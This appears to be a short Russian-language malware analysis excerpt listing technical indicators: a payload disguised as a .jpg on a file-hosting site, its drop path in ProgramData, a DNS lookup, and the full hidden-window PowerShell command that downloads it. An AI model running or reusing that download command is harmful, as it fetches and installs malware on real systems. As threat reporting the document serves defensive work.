Техническая информация
- https://a.top4top.net/p_923mr3nc1.jpg как %programdata%\sr.exe
- %PROGRAMDATA%\sr.exe
- DNS ASK a.###4top.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('https://a.top4top.net/p_923mr3nc1.jpg','%PROGRAMDATA%\Sr.exe')' (со скрытым окном)